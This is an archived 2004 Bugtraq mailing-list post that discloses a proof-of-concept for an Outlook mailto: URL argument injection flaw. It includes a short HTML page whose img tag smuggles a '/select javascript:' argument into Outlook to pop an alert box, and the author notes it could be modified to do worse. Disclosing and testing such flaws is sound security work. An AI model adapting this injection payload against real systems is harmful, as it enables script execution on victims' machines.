lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 11 Mar 2004 12:58:18 +0000 (GMT)
From: Shaun Colley <shaunige@...oo.co.uk>
To: bugtraq@...urityfocus.com
Subject: RE: Outlook mailto: URL argument injection vulnerability


Hello Bugtraq,

For those interested in testing the impact of this 
vulnerability, I have written a simple, non-malicious
PoC for this issue:

http://www.nettwerked.co.uk/code/outlooksploit.html


If you'd rather not visit an unverified link, here's
the code:


###outlooksploit.html
<!-- Outlook mailto: URL argument injection
proof-of-concept exploit,
     by shaun2k2.  The exploit can be easily modified
to execute more
     malicious things.
-->

<html>
<body>
<!-- This is the exploit string. -->
<img src="mailto:aa&quot; /select
javascript:alert('vulnerable')">
</body>
</html>
###EOF

If you're vulnerable, Outlook will launch and you will
see an alert box saying "vulnerable".  Also, depending
on what version you are using, you might get an error
box saying outlook cannot load and that the command
line argument was not valid.  Either way, you are
still vulnerable, I believe.  I recommend you upgrade
:).

Obviously, the exploit could be easily modified to do
more malicious things, but this at least demonstrates
the issue.



Thank you for your time.
Shaun.


	
	
		
___________________________________________________________
Yahoo! Messenger - Communicate instantly..."Ping" 
your friends today! Download Messenger Now 
http://uk.messenger.yahoo.com/download/index.html


Powered by blists - more mailing lists